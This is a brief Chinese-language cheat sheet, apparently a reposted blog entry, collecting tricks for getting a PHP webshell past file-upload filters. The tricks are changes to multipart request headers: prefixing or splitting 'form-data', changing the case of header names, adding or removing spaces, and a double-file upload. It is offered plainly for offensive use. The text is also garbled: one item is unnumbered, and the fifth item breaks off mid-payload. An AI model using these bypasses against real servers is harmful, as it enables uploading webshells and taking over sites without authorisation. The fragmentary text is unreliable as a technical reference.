Getshell文件上传绕过整理

1.绕过思路：对文件的内容，数据。数据包进行处理。

关键点在这里Content-Disposition:form-data;name="file";filename="ian.php"将form-data;修改为~form-data;

2.通过替换大小写来进行绕过

Content-Disposition:form-data;name="file";filename="yjh.php"Content-Type:application/octet-stream将Content-Disposition修改为content-Disposition将form-data修改为Form-data将Content-Type修改为content-Type

.通过删减空格来进行绕过

Content-Disposition:form-data;name="file";filename="yjh.php"Content-Type:application/octet-stream将Content-Disposition:form-data冒号后面增加或减少一个空格将form-data;name="file";分号后面增加或减少一个空格将Content-Type:application/octet-stream冒号后面增加一个空格

4.通过字符串拼接绕过

看Content-Disposition:form-data;name="file";filename="yjh.php"将form-data修改为f+orm-data将from-data修改为form-d+ata

5.双文件上传绕过

formaction="

转载请注明：http://www.aierlanlan.com/rzdk/142.html